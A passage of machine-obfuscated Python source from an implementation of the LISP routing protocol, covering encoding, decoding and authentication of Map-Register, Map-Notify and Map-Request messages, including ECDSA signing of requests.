if 59 - 59: ooOoO0o * OoO0O00 - I1Ii111 % oO0o
Oo00oo = struct . pack ( "I" , socket . htonl ( iIiIii ) )
Oo00oo += struct . pack ( "QBBH" , self . nonce , self . key_id , self . alg_id ,
socket . htons ( self . auth_len ) )
if 95 - 95: II111iiii + II111iiii
Oo00oo = self . zero_auth ( Oo00oo )
return ( Oo00oo )
if 33 - 33: i1IIi . Oo0Ooo - IiII
if 30 - 30: OoooooooOO % OOooOOo
def zero_auth ( self , packet ) :
oo00 = struct . calcsize ( "I" ) + struct . calcsize ( "QHH" )
IIiI = b""
oOOOO00o00 = 0
if ( self . alg_id == LISP_NONE_ALG_ID ) : return ( packet )
if ( self . alg_id == LISP_SHA_1_96_ALG_ID ) :
IIiI = struct . pack ( "QQI" , 0 , 0 , 0 )
oOOOO00o00 = struct . calcsize ( "QQI" )
if 66 - 66: I1ii11iIi11i * Ii1I / OoooooooOO * O0 % OOooOOo
if ( self . alg_id == LISP_SHA_256_128_ALG_ID ) :
IIiI = struct . pack ( "QQQQ" , 0 , 0 , 0 , 0 )
oOOOO00o00 = struct . calcsize ( "QQQQ" )
if 49 - 49: II111iiii . I1IiiI * O0 * Ii1I / I1Ii111 * OoooooooOO
packet = packet [ 0 : oo00 ] + IIiI + packet [ oo00 + oOOOO00o00 : : ]
return ( packet )
if 82 - 82: Oo0Ooo / Ii1I / Ii1I % Ii1I
if 20 - 20: ooOoO0o
def encode_auth ( self , packet ) :
oo00 = struct . calcsize ( "I" ) + struct . calcsize ( "QHH" )
oOOOO00o00 = self . auth_len
IIiI = self . auth_data
packet = packet [ 0 : oo00 ] + IIiI + packet [ oo00 + oOOOO00o00 : : ]
return ( packet )
if 63 - 63: iIii1I11I1II1 . OoO0O00
if 100 - 100: i1IIi * i1IIi
def decode ( self , packet ) :
i1o0o0oOO = packet
iiII1iiI = "I"
ooo0000oo0 = struct . calcsize ( iiII1iiI )
if ( len ( packet ) < ooo0000oo0 ) : return ( [ None , None ] )
if 76 - 76: O0 * II111iiii
iIiIii = struct . unpack ( iiII1iiI , packet [ : ooo0000oo0 ] )
iIiIii = socket . ntohl ( iIiIii [ 0 ] )
packet = packet [ ooo0000oo0 : : ]
if 38 - 38: I1Ii111
iiII1iiI = "QBBH"
ooo0000oo0 = struct . calcsize ( iiII1iiI )
if ( len ( packet ) < ooo0000oo0 ) : return ( [ None , None ] )
if 18 - 18: Ii1I - iII111i
self . nonce , self . key_id , self . alg_id , self . auth_len = struct . unpack ( iiII1iiI , packet [ : ooo0000oo0 ] )
if 18 - 18: II111iiii
if 92 - 92: o0oOOo0O0Ooo . I1Ii111 + iII111i % I1Ii111 % i11iIiiIii
self . nonce = byte_swap_64 ( self . nonce )
self . auth_len = socket . ntohs ( self . auth_len )
self . proxy_reply_requested = True if ( iIiIii & 0x08000000 ) else False
if 46 - 46: OoooooooOO
self . lisp_sec_present = True if ( iIiIii & 0x04000000 ) else False
self . xtr_id_present = True if ( iIiIii & 0x02000000 ) else False
self . use_ttl_for_timeout = True if ( iIiIii & 0x800 ) else False
self . map_register_refresh = True if ( iIiIii & 0x1000 ) else False
self . merge_register_requested = True if ( iIiIii & 0x400 ) else False
self . mobile_node = True if ( iIiIii & 0x200 ) else False
self . map_notify_requested = True if ( iIiIii & 0x100 ) else False
self . record_count = iIiIii & 0xff
if 80 - 80: O0 * iII111i
if 73 - 73: IiII / Ii1I + I1Ii111 . OOooOOo - II111iiii / iIii1I11I1II1
if 79 - 79: I1Ii111 * Oo0Ooo . o0oOOo0O0Ooo - I1Ii111
if 16 - 16: I1IiiI - O0 * I1ii11iIi11i . I1ii11iIi11i % OOooOOo
self . encrypt_bit = True if iIiIii & 0x2000 else False
if ( self . encrypt_bit ) :
self . encryption_key_id = ( iIiIii >> 14 ) & 0x7
if 39 - 39: II111iiii / I11i - OoOoOO00 * OoOoOO00 - Ii1I
if 8 - 8: O0 . i11iIiiIii
if 54 - 54: OOooOOo . I1ii11iIi11i * I11i % I1Ii111 . O0 * IiII
if 87 - 87: Ii1I % I1ii11iIi11i * Oo0Ooo
if 59 - 59: Oo0Ooo / I11i - iIii1I11I1II1 * iIii1I11I1II1
if ( self . xtr_id_present ) :
if ( self . decode_xtr_id ( i1o0o0oOO ) == False ) : return ( [ None , None ] )
if 18 - 18: I11i * I1ii11iIi11i / i11iIiiIii / iIii1I11I1II1 * OoooooooOO . OOooOOo
if 69 - 69: Oo0Ooo * ooOoO0o
packet = packet [ ooo0000oo0 : : ]
if 91 - 91: o0oOOo0O0Ooo . ooOoO0o / OoO0O00 / i11iIiiIii * o0oOOo0O0Ooo
if 52 - 52: I1IiiI - i11iIiiIii / IiII . oO0o
if 38 - 38: oO0o + OoooooooOO * OoOoOO00 % oO0o
if 91 - 91: i1IIi - I1ii11iIi11i * I1IiiI
if ( self . auth_len != 0 ) :
if ( len ( packet ) < self . auth_len ) : return ( [ None , None ] )
if 24 - 24: OoOoOO00 * Ii1I
if ( self . alg_id not in ( LISP_NONE_ALG_ID , LISP_SHA_1_96_ALG_ID ,
LISP_SHA_256_128_ALG_ID ) ) :
lprint ( "Invalid authentication alg-id: {}" . format ( self . alg_id ) )
return ( [ None , None ] )
if 17 - 17: OoO0O00 . I1IiiI * O0
if 81 - 81: OOooOOo
oOOOO00o00 = self . auth_len
if ( self . alg_id == LISP_SHA_1_96_ALG_ID ) :
ooo0000oo0 = struct . calcsize ( "QQI" )
if ( oOOOO00o00 < ooo0000oo0 ) :
lprint ( "Invalid sha1-96 authentication length" )
return ( [ None , None ] )
if 58 - 58: II111iiii . I1Ii111 . Ii1I * OoooooooOO / Ii1I / I11i
i1iI11I , oOoOOO , iI1i11i1i1i = struct . unpack ( "QQI" , packet [ : oOOOO00o00 ] )
OoO00O = b""
elif ( self . alg_id == LISP_SHA_256_128_ALG_ID ) :
ooo0000oo0 = struct . calcsize ( "QQQQ" )
if ( oOOOO00o00 < ooo0000oo0 ) :
lprint ( "Invalid sha2-256 authentication length" )
return ( [ None , None ] )
if 87 - 87: ooOoO0o - i11iIiiIii / iIii1I11I1II1 % I1IiiI
i1iI11I , oOoOOO , iI1i11i1i1i , OoO00O = struct . unpack ( "QQQQ" ,
packet [ : oOOOO00o00 ] )
else :
lprint ( "Unsupported authentication alg-id value {}" . format ( self . alg_id ) )
if 56 - 56: I1IiiI
return ( [ None , None ] )
if 31 - 31: iII111i
self . auth_data = lisp_concat_auth_data ( self . alg_id , i1iI11I , oOoOOO ,
iI1i11i1i1i , OoO00O )
i1o0o0oOO = self . zero_auth ( i1o0o0oOO )
packet = packet [ self . auth_len : : ]
if 1 - 1: I1Ii111 / OoOoOO00 * OoOoOO00 - o0oOOo0O0Ooo % Ii1I
return ( [ i1o0o0oOO , packet ] )
if 96 - 96: IiII / Ii1I % OoO0O00 . iIii1I11I1II1
if 30 - 30: I11i - OoO0O00
def encode_xtr_id ( self , packet ) :
iiii = self . xtr_id >> 64
Oo000O00o0O = self . xtr_id & 0xffffffffffffffff
iiii = byte_swap_64 ( iiii )
Oo000O00o0O = byte_swap_64 ( Oo000O00o0O )
o0o0oo0oO = byte_swap_64 ( self . site_id )
packet += struct . pack ( "QQQ" , iiii , Oo000O00o0O , o0o0oo0oO )
return ( packet )
if 6 - 6: i11iIiiIii + OoooooooOO % i11iIiiIii . I11i * OoooooooOO - Oo0Ooo
if 88 - 88: oO0o
def decode_xtr_id ( self , packet ) :
ooo0000oo0 = struct . calcsize ( "QQQ" )
if ( len ( packet ) < ooo0000oo0 ) : return ( [ None , None ] )
packet = packet [ len ( packet ) - ooo0000oo0 : : ]
iiii , Oo000O00o0O , o0o0oo0oO = struct . unpack ( "QQQ" ,
packet [ : ooo0000oo0 ] )
iiii = byte_swap_64 ( iiii )
Oo000O00o0O = byte_swap_64 ( Oo000O00o0O )
self . xtr_id = ( iiii << 64 ) | Oo000O00o0O
self . site_id = byte_swap_64 ( o0o0oo0oO )
return ( True )
if 33 - 33: o0oOOo0O0Ooo / i1IIi
if 71 - 71: OoooooooOO - iII111i + Ii1I / O0 % o0oOOo0O0Ooo + OoO0O00
if 83 - 83: IiII * I1ii11iIi11i / IiII * IiII - OOooOOo
if 89 - 89: OoO0O00 % I11i
if 51 - 51: ooOoO0o * Ii1I * OoooooooOO % OoOoOO00
if 25 - 25: iIii1I11I1II1 * OoooooooOO * Ii1I - i1IIi
if 23 - 23: o0oOOo0O0Ooo . ooOoO0o - OoooooooOO + I11i
if 73 - 73: OoOoOO00
if 71 - 71: i11iIiiIii * OoOoOO00 * OOooOOo + oO0o + Oo0Ooo
if 59 - 59: IiII
if 54 - 54: OOooOOo
if 27 - 27: OoOoOO00 - OoO0O00 + o0oOOo0O0Ooo + ooOoO0o . OoO0O00
if 86 - 86: II111iiii - OoooooooOO - ooOoO0o % iII111i
if 16 - 16: ooOoO0o + Oo0Ooo + OoooooooOO
if 87 - 87: I1IiiI . oO0o / IiII - OoooooooOO
if 33 - 33: oO0o % OoO0O00 . iIii1I11I1II1 / IiII
if 3 - 3: Ii1I + OoO0O00
if 60 - 60: OoO0O00 . OoOoOO00 - I1ii11iIi11i - I1IiiI - II111iiii % Oo0Ooo
if 62 - 62: O0 + iII111i - iII111i % iIii1I11I1II1
if 47 - 47: I1Ii111 + I1IiiI
if 40 - 40: iIii1I11I1II1 % Ii1I + II111iiii - I1IiiI
if 80 - 80: oO0o
if 81 - 81: OoooooooOO / ooOoO0o * iIii1I11I1II1 . Oo0Ooo + oO0o / O0
if 84 - 84: II111iiii - o0oOOo0O0Ooo
if 78 - 78: IiII
if 58 - 58: i11iIiiIii - OoOoOO00
if 67 - 67: I1ii11iIi11i / iII111i + iIii1I11I1II1 % I1IiiI
if 99 - 99: ooOoO0o . Ii1I
if 92 - 92: i1IIi
if 68 - 68: OoO0O00 % IiII - oO0o - ooOoO0o . Oo0Ooo
if 30 - 30: OoooooooOO % o0oOOo0O0Ooo + ooOoO0o * OoO0O00
if 57 - 57: I11i + iIii1I11I1II1 . OoO0O00 + oO0o
if 4 - 4: Ii1I
class lisp_map_notify ( object ) :
def __init__ ( self , lisp_sockets ) :
self . etr = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . etr_port = 0
self . retransmit_timer = None
self . lisp_sockets = lisp_sockets
self . retry_count = 0
self . record_count = 0
self . alg_id = LISP_NONE_ALG_ID
self . key_id = 0
self . auth_len = 0
self . auth_data = ""
self . nonce = 0
self . nonce_key = ""
self . packet = None
self . site = ""
self . map_notify_ack = False
self . eid_records = ""
self . eid_list = [ ]
if 43 - 43: i1IIi . I1IiiI * iIii1I11I1II1 * i11iIiiIii - OOooOOo + ooOoO0o
if 56 - 56: Oo0Ooo % i11iIiiIii / Ii1I . I1Ii111 . OoO0O00 - OoOoOO00
def print_notify ( self ) :
IIiI = binascii . hexlify ( self . auth_data )
if ( self . alg_id == LISP_SHA_1_96_ALG_ID and len ( IIiI ) != 40 ) :
IIiI = self . auth_data
elif ( self . alg_id == LISP_SHA_256_128_ALG_ID and len ( IIiI ) != 64 ) :
IIiI = self . auth_data
if 32 - 32: I1Ii111 / oO0o / I1IiiI
IiiiI1 = ( "{} -> record-count: {}, nonce: 0x{}, key/alg-id: " +
"{}{}{}, auth-len: {}, auth-data: {}" )
lprint ( IiiiI1 . format ( bold ( "Map-Notify-Ack" , False ) if self . map_notify_ack else bold ( "Map-Notify" , False ) ,
# OOooOOo - OoO0O00
self . record_count , lisp_hex_string ( self . nonce ) , self . key_id ,
self . alg_id , " (sha1)" if ( self . key_id == LISP_SHA_1_96_ALG_ID ) else ( " (sha2)" if ( self . key_id == LISP_SHA_256_128_ALG_ID ) else "" ) , self . auth_len , IIiI ) )
if 3 - 3: Oo0Ooo + OOooOOo - I1IiiI
if 60 - 60: O0 / i1IIi % i11iIiiIii / iII111i
if 97 - 97: i1IIi % OoooooooOO
if 83 - 83: I11i . OOooOOo + I1Ii111 * I11i . I1Ii111 + oO0o
def zero_auth ( self , packet ) :
if ( self . alg_id == LISP_NONE_ALG_ID ) : return ( packet )
if ( self . alg_id == LISP_SHA_1_96_ALG_ID ) :
IIiI = struct . pack ( "QQI" , 0 , 0 , 0 )
if 64 - 64: Ii1I . o0oOOo0O0Ooo - i1IIi
if ( self . alg_id == LISP_SHA_256_128_ALG_ID ) :
IIiI = struct . pack ( "QQQQ" , 0 , 0 , 0 , 0 )
if 35 - 35: I1ii11iIi11i % OoooooooOO
packet += IIiI
return ( packet )
if 59 - 59: I1IiiI % I11i
if 32 - 32: I1IiiI * O0 + O0
def encode ( self , eid_records , password ) :
if ( self . map_notify_ack ) :
iIiIii = ( LISP_MAP_NOTIFY_ACK << 28 ) | self . record_count
else :
iIiIii = ( LISP_MAP_NOTIFY << 28 ) | self . record_count
if 34 - 34: IiII
Oo00oo = struct . pack ( "I" , socket . htonl ( iIiIii ) )
Oo00oo += struct . pack ( "QBBH" , self . nonce , self . key_id , self . alg_id ,
socket . htons ( self . auth_len ) )
if 5 - 5: OoO0O00 . I1IiiI
if ( self . alg_id == LISP_NONE_ALG_ID ) :
self . packet = Oo00oo + eid_records
return ( self . packet )
if 48 - 48: Oo0Ooo - OoO0O00 . I11i - iIii1I11I1II1 % Ii1I
if 47 - 47: iII111i / OoooooooOO - II111iiii
if 91 - 91: OoOoOO00 + o0oOOo0O0Ooo
if 23 - 23: i1IIi
if 9 - 9: i1IIi % I1Ii111 - OoO0O00 * OoOoOO00 . o0oOOo0O0Ooo
Oo00oo = self . zero_auth ( Oo00oo )
Oo00oo += eid_records
if 18 - 18: Ii1I . OoOoOO00 + iII111i . I1IiiI + OoooooooOO . OoO0O00
II1Iii1iI = lisp_hash_me ( Oo00oo , self . alg_id , password , False )
if 31 - 31: I1Ii111 - I11i
oo00 = struct . calcsize ( "I" ) + struct . calcsize ( "QHH" )
oOOOO00o00 = self . auth_len
self . auth_data = II1Iii1iI
Oo00oo = Oo00oo [ 0 : oo00 ] + II1Iii1iI + Oo00oo [ oo00 + oOOOO00o00 : : ]
self . packet = Oo00oo
return ( Oo00oo )
if 49 - 49: iIii1I11I1II1 - iIii1I11I1II1 - OoOoOO00 + IiII / OoOoOO00
if 74 - 74: OoooooooOO + I1ii11iIi11i % O0
def decode ( self , packet ) :
i1o0o0oOO = packet
iiII1iiI = "I"
ooo0000oo0 = struct . calcsize ( iiII1iiI )
if ( len ( packet ) < ooo0000oo0 ) : return ( None )
if 32 - 32: I1ii11iIi11i + I1ii11iIi11i
iIiIii = struct . unpack ( iiII1iiI , packet [ : ooo0000oo0 ] )
iIiIii = socket . ntohl ( iIiIii [ 0 ] )
self . map_notify_ack = ( ( iIiIii >> 28 ) == LISP_MAP_NOTIFY_ACK )
self . record_count = iIiIii & 0xff
packet = packet [ ooo0000oo0 : : ]
if 89 - 89: ooOoO0o + oO0o + Ii1I - OOooOOo
iiII1iiI = "QBBH"
ooo0000oo0 = struct . calcsize ( iiII1iiI )
if ( len ( packet ) < ooo0000oo0 ) : return ( None )
if 12 - 12: OoOoOO00 - o0oOOo0O0Ooo - I1Ii111 / I11i
self . nonce , self . key_id , self . alg_id , self . auth_len = struct . unpack ( iiII1iiI , packet [ : ooo0000oo0 ] )
if 17 - 17: OoO0O00 - I1Ii111 - II111iiii / I1Ii111 / Ii1I
self . nonce_key = lisp_hex_string ( self . nonce )
self . auth_len = socket . ntohs ( self . auth_len )
packet = packet [ ooo0000oo0 : : ]
self . eid_records = packet [ self . auth_len : : ]
if 30 - 30: OOooOOo * I1ii11iIi11i % I1ii11iIi11i + iII111i * IiII
if ( self . auth_len == 0 ) : return ( self . eid_records )
if 33 - 33: o0oOOo0O0Ooo + I11i * O0 * OoO0O00 . I1ii11iIi11i
if 74 - 74: iII111i * iII111i * o0oOOo0O0Ooo / oO0o
if 91 - 91: i11iIiiIii . I1ii11iIi11i / II111iiii
if 97 - 97: Ii1I % i1IIi % IiII + Oo0Ooo - O0 - I11i
if ( len ( packet ) < self . auth_len ) : return ( None )
if 64 - 64: Ii1I - iII111i
oOOOO00o00 = self . auth_len
if ( self . alg_id == LISP_SHA_1_96_ALG_ID ) :
i1iI11I , oOoOOO , iI1i11i1i1i = struct . unpack ( "QQI" , packet [ : oOOOO00o00 ] )
OoO00O = ""
if 12 - 12: i1IIi
if ( self . alg_id == LISP_SHA_256_128_ALG_ID ) :
i1iI11I , oOoOOO , iI1i11i1i1i , OoO00O = struct . unpack ( "QQQQ" ,
packet [ : oOOOO00o00 ] )
if 99 - 99: II111iiii - I1ii11iIi11i * IiII
self . auth_data = lisp_concat_auth_data ( self . alg_id , i1iI11I , oOoOOO ,
iI1i11i1i1i , OoO00O )
if 3 - 3: IiII - I1ii11iIi11i * iII111i * I1ii11iIi11i + Oo0Ooo
ooo0000oo0 = struct . calcsize ( "I" ) + struct . calcsize ( "QHH" )
packet = self . zero_auth ( i1o0o0oOO [ : ooo0000oo0 ] )
ooo0000oo0 += oOOOO00o00
packet += i1o0o0oOO [ ooo0000oo0 : : ]
return ( packet )
if 15 - 15: I1ii11iIi11i * Ii1I / iII111i . o0oOOo0O0Ooo / Ii1I % OoOoOO00
if 75 - 75: OoooooooOO % i11iIiiIii % iIii1I11I1II1 % I1ii11iIi11i / i11iIiiIii
if 96 - 96: ooOoO0o * oO0o / iIii1I11I1II1 / I11i
if 5 - 5: o0oOOo0O0Ooo
if 83 - 83: I11i * I1IiiI . II111iiii * i1IIi % O0
if 35 - 35: OoOoOO00 % OoO0O00 + O0 * o0oOOo0O0Ooo % I1ii11iIi11i
if 57 - 57: oO0o / I11i
if 63 - 63: ooOoO0o * OoO0O00 * ooOoO0o + OoOoOO00
if 25 - 25: iII111i * OoOoOO00 / I1IiiI / IiII
if 11 - 11: OOooOOo + i11iIiiIii
if 14 - 14: OoOoOO00 / IiII + OoO0O00 - Ii1I
if 38 - 38: I1Ii111
if 30 - 30: II111iiii + I11i . i11iIiiIii + iIii1I11I1II1
if 100 - 100: oO0o * o0oOOo0O0Ooo / iII111i
if 92 - 92: ooOoO0o / i11iIiiIii * OOooOOo
if 55 - 55: ooOoO0o
if 1 - 1: OoO0O00
if 43 - 43: iIii1I11I1II1 - OOooOOo - o0oOOo0O0Ooo + I1ii11iIi11i - I1Ii111 % I1ii11iIi11i
if 58 - 58: OoOoOO00
if 27 - 27: IiII * OOooOOo - OoooooooOO . Ii1I - II111iiii
if 62 - 62: I1IiiI / iIii1I11I1II1 * I11i
if 84 - 84: IiII - OoOoOO00 . IiII + ooOoO0o . iII111i
if 96 - 96: Ii1I % iII111i * Ii1I % I1IiiI . o0oOOo0O0Ooo / o0oOOo0O0Ooo
if 7 - 7: OoO0O00 - ooOoO0o % i1IIi
if 24 - 24: OoO0O00 % O0 % I11i
if 61 - 61: ooOoO0o . iII111i / ooOoO0o * OoooooooOO
if 13 - 13: II111iiii
if 17 - 17: II111iiii
if 66 - 66: IiII * oO0o
if 73 - 73: i11iIiiIii + O0 % O0
if 70 - 70: II111iiii * OoooooooOO - Ii1I + oO0o * O0
if 49 - 49: oO0o . Ii1I . OoOoOO00 - I1ii11iIi11i
if 74 - 74: ooOoO0o % I1ii11iIi11i * i1IIi
if 18 - 18: OoOoOO00
if 30 - 30: II111iiii
if 27 - 27: i1IIi - iIii1I11I1II1 + O0 % Oo0Ooo / OOooOOo + i1IIi
if 48 - 48: Oo0Ooo
if 70 - 70: OoooooooOO * i11iIiiIii
if 60 - 60: IiII / iIii1I11I1II1 + OoooooooOO - I1ii11iIi11i * i11iIiiIii
if 47 - 47: O0 . I1IiiI / ooOoO0o % i11iIiiIii
if 47 - 47: Ii1I . OoOoOO00 . iIii1I11I1II1 . o0oOOo0O0Ooo
if 39 - 39: o0oOOo0O0Ooo
if 89 - 89: OoooooooOO + iII111i . I1Ii111 / Ii1I
if 75 - 75: iIii1I11I1II1 * iII111i / OoOoOO00 * II111iiii . i1IIi
if 6 - 6: Ii1I % Ii1I / OoooooooOO * oO0o . I1IiiI . i1IIi
if 59 - 59: I11i . I11i * I1IiiI - Ii1I % OoOoOO00
if 19 - 19: OoooooooOO / Oo0Ooo - I1Ii111 . OoOoOO00
if 8 - 8: I11i % ooOoO0o . iIii1I11I1II1
if 95 - 95: o0oOOo0O0Ooo + i11iIiiIii . I1ii11iIi11i . ooOoO0o . o0oOOo0O0Ooo
if 93 - 93: iII111i
class lisp_map_request ( object ) :
def __init__ ( self ) :
self . auth_bit = False
self . map_data_present = False
self . rloc_probe = False
self . smr_bit = False
self . pitr_bit = False
self . smr_invoked_bit = False
self . mobile_node = False
self . xtr_id_present = False
self . local_xtr = False
self . dont_reply_bit = False
self . itr_rloc_count = 0
self . record_count = 0
self . nonce = 0
self . signature_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . source_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . target_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . target_group = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . itr_rlocs = [ ]
self . keys = None
self . privkey_filename = None
self . map_request_signature = None
self . subscribe_bit = False
self . xtr_id = None
self . json_telemetry = None
if 55 - 55: II111iiii % o0oOOo0O0Ooo - OoO0O00
if 48 - 48: ooOoO0o * iIii1I11I1II1 % OoOoOO00
def print_prefix ( self ) :
if ( self . target_group . is_null ( ) ) :
return ( green ( self . target_eid . print_prefix ( ) , False ) )
if 100 - 100: II111iiii - i11iIiiIii + OoO0O00 % ooOoO0o - iIii1I11I1II1 * i11iIiiIii
return ( green ( self . target_eid . print_sg ( self . target_group ) , False ) )
if 30 - 30: OoO0O00 . OoO0O00 . Ii1I % Ii1I * i1IIi * oO0o
if 74 - 74: OoooooooOO
def print_map_request ( self ) :
oOOOOOo0OO0o0oOO0 = ""
if ( self . xtr_id != None and self . subscribe_bit ) :
oOOOOOo0OO0o0oOO0 = "subscribe, xtr-id: 0x{}, " . format ( lisp_hex_string ( self . xtr_id ) )
if 33 - 33: o0oOOo0O0Ooo - II111iiii
if 95 - 95: OoooooooOO
if 23 - 23: II111iiii + I11i / O0 . I11i . I1Ii111 + iIii1I11I1II1
IiiiI1 = ( "{} -> flags: {}{}{}{}{}{}{}{}{}{}, itr-rloc-" +
"count: {} (+1), record-count: {}, nonce: 0x{}, source-eid: " +
"afi {}, {}{}, target-eid: afi {}, {}, {}ITR-RLOCs:" )
if 2 - 2: i1IIi . O0 / o0oOOo0O0Ooo . II111iiii / OoO0O00 % i1IIi
lprint ( IiiiI1 . format ( bold ( "Map-Request" , False ) , "A" if self . auth_bit else "a" ,
# i11iIiiIii
"D" if self . map_data_present else "d" ,
"R" if self . rloc_probe else "r" ,
"S" if self . smr_bit else "s" ,
"P" if self . pitr_bit else "p" ,
"I" if self . smr_invoked_bit else "i" ,
"M" if self . mobile_node else "m" ,
"X" if self . xtr_id_present else "x" ,
"L" if self . local_xtr else "l" ,
"D" if self . dont_reply_bit else "d" , self . itr_rloc_count ,
self . record_count , lisp_hex_string ( self . nonce ) ,
self . source_eid . afi , green ( self . source_eid . print_address ( ) , False ) ,
" (with sig)" if self . map_request_signature != None else "" ,
self . target_eid . afi , green ( self . print_prefix ( ) , False ) , oOOOOOo0OO0o0oOO0 ) )
if 52 - 52: ooOoO0o % iIii1I11I1II1 . i11iIiiIii % ooOoO0o
iI1iiiiiii = self . keys
for oO0oO00OO00 in self . itr_rlocs :
if ( oO0oO00OO00 . afi == LISP_AFI_LCAF and self . json_telemetry != None ) :
continue
if 75 - 75: o0oOOo0O0Ooo + I1IiiI % ooOoO0o * I1Ii111
Oooo000 = red ( oO0oO00OO00 . print_address_no_iid ( ) , False )
lprint ( " itr-rloc: afi {} {}{}" . format ( oO0oO00OO00 . afi , Oooo000 ,
"" if ( iI1iiiiiii == None ) else ", " + iI1iiiiiii [ 1 ] . print_keys ( ) ) )
iI1iiiiiii = None
if 52 - 52: iIii1I11I1II1 / iII111i . O0 * IiII . I1IiiI
if ( self . json_telemetry != None ) :
lprint ( " itr-rloc: afi {} telemetry: {}" . format ( LISP_AFI_LCAF ,
self . json_telemetry ) )
if 67 - 67: II111iiii + Ii1I - I1IiiI * ooOoO0o
if 19 - 19: i11iIiiIii * Oo0Ooo
if 33 - 33: i11iIiiIii + I1IiiI
def sign_map_request ( self , privkey ) :
OO00O = self . signature_eid . print_address ( )
iiO0OoO0OOO00 = self . source_eid . print_address ( )
IIIiii1I = self . target_eid . print_address ( )
ii1iiii11IiI1 = lisp_hex_string ( self . nonce ) + iiO0OoO0OOO00 + IIIiii1I
self . map_request_signature = privkey . sign ( ii1iiii11IiI1 . encode ( ) )
O0OoO0ooOoo = binascii . b2a_base64 ( self . map_request_signature )
O0OoO0ooOoo = { "source-eid" : iiO0OoO0OOO00 , "signature-eid" : OO00O ,
"signature" : O0OoO0ooOoo . decode ( ) }
return ( json . dumps ( O0OoO0ooOoo ) )
if 43 - 43: O0
if 57 - 57: i11iIiiIii + I11i % ooOoO0o / iIii1I11I1II1
def verify_map_request_sig ( self , pubkey ) :
OOoOoOO = green ( self . signature_eid . print_address ( ) , False )
if ( pubkey == None ) :
lprint ( "Public-key not found for signature-EID {}" . format ( OOoOoOO ) )
return ( False )
if 50 - 50: i1IIi % IiII % I1Ii111
if 76 - 76: ooOoO0o % I1IiiI
iiO0OoO0OOO00 = self . source_eid . print_address ( )
IIIiii1I = self . target_eid . print_address ( )
ii1iiii11IiI1 = lisp_hex_string ( self . nonce ) + iiO0OoO0OOO00 + IIIiii1I
pubkey = binascii . a2b_base64 ( pubkey )
if 18 - 18: OoO0O00
O0oOo = True
try :
III = ecdsa . VerifyingKey . from_pem ( pubkey )
except :
lprint ( "Invalid public-key in mapping system for sig-eid {}" . format ( self . signature_eid . print_address_no_iid ( ) ) )
if 1 - 1: oO0o % I11i / OoOoOO00
O0oOo = False
if 15 - 15: OoO0O00 - OoOoOO00
if 41 - 41: Ii1I * I11i
if ( O0oOo ) :
try :
ii1iiii11IiI1 = ii1iiii11IiI1 . encode ( )
O0oOo = III . verify ( self . map_request_signature , ii1iiii11IiI1 )
except :
O0oOo = False
if 13 - 13: Oo0Ooo * o0oOOo0O0Ooo * iII111i
if 71 - 71: OOooOOo + OoooooooOO + iIii1I11I1II1
if 99 - 99: OoO0O00 - IiII * IiII + oO0o / iII111i + OOooOOo
Oo0oOO = bold ( "passed" if O0oOo else "failed" , False )
lprint ( "Signature verification {} for EID {}" . format ( Oo0oOO , OOoOoOO ) )
return ( O0oOo )
if 49 - 49: i1IIi . IiII
if 82 - 82: OoO0O00 / I11i
def encode_json ( self , json_string ) :
ooOoOoOo = LISP_LCAF_JSON_TYPE
ii1 = socket . htons ( LISP_AFI_LCAF )
iIIIi1Iii1 = socket . htons ( len ( json_string ) + 4 )
oOoOOOo0oo = socket . htons ( len ( json_string ) )
Oo00oo = struct . pack ( "HBBBBHH" , ii1 , 0 , 0 , ooOoOoOo , 0 , iIIIi1Iii1 ,
oOoOOOo0oo )
Oo00oo += json_string . encode ( )
Oo00oo += struct . pack ( "H" , 0 )
return ( Oo00oo )
if 68 - 68: IiII - I11i % II111iiii - o0oOOo0O0Ooo % ooOoO0o
if 41 - 41: iII111i . ooOoO0o % OoooooooOO / I1IiiI * II111iiii - iII111i
def encode ( self , probe_dest , probe_port ) :
iIiIii = ( LISP_MAP_REQUEST << 28 ) | self . record_count
if 19 - 19: OoO0O00 . I11i / i11iIiiIii - OoOoOO00 * I11i . IiII
Ii1i = lisp_telemetry_configured ( ) if ( self . rloc_probe ) else None
if ( Ii1i != None ) : self . itr_rloc_count += 1
iIiIii = iIiIii | ( self . itr_rloc_count << 8 )
if 45 - 45: I1Ii111 - O0 . I1Ii111 / I1Ii111 / OoOoOO00
if ( self . auth_bit ) : iIiIii |= 0x08000000
if ( self . map_data_present ) : iIiIii |= 0x04000000
if ( self . rloc_probe ) : iIiIii |= 0x02000000
if ( self . smr_bit ) : iIiIii |= 0x01000000
if ( self . pitr_bit ) : iIiIii |= 0x00800000
if ( self . smr_invoked_bit ) : iIiIii |= 0x00400000
if ( self . mobile_node ) : iIiIii |= 0x00200000
if ( self . xtr_id_present ) : iIiIii |= 0x00100000
if ( self . local_xtr ) : iIiIii |= 0x00004000
if ( self . dont_reply_bit ) : iIiIii |= 0x00002000
if 12 - 12: OOooOOo
Oo00oo = struct . pack ( "I" , socket . htonl ( iIiIii ) )
Oo00oo += struct . pack ( "Q" , self . nonce )
if 75 - 75: OOooOOo + Ii1I + oO0o . Oo0Ooo
if 93 - 93: OOooOOo * Ii1I - o0oOOo0O0Ooo . oO0o . iII111i
if 64 - 64: Oo0Ooo / iIii1I11I1II1 . OoO0O00 / o0oOOo0O0Ooo / I11i
if 3 - 3: OOooOOo - o0oOOo0O0Ooo * iIii1I11I1II1 . Ii1I + OoOoOO00 % I1Ii111
if 11 - 11: OOooOOo
if 12 - 12: OoooooooOO * OOooOOo * I1ii11iIi11i * ooOoO0o
iiI = False
i11i1I1 = self . privkey_filename
if ( i11i1I1 != None and os . path . exists ( i11i1I1 ) ) :
o0OoO0 = open ( i11i1I1 , "r" ) ; III = o0OoO0 . read ( ) ; o0OoO0 . close ( )
try :
III = ecdsa . SigningKey . from_pem ( III )
except :
return ( None )
if 30 - 30: IiII . OoooooooOO * Oo0Ooo % ooOoO0o . oO0o
OoOo00OO0o00 = self . sign_map_request ( III )
iiI = True
elif ( self . map_request_signature != None ) :
O0OoO0ooOoo = binascii . b2a_base64 ( self . map_request_signature )
OoOo00OO0o00 = { "source-eid" : self . source_eid . print_address ( ) ,
"signature-eid" : self . signature_eid . print_address ( ) ,
"signature" : O0OoO0ooOoo }
OoOo00OO0o00 = json . dumps ( OoOo00OO0o00 )
iiI = True
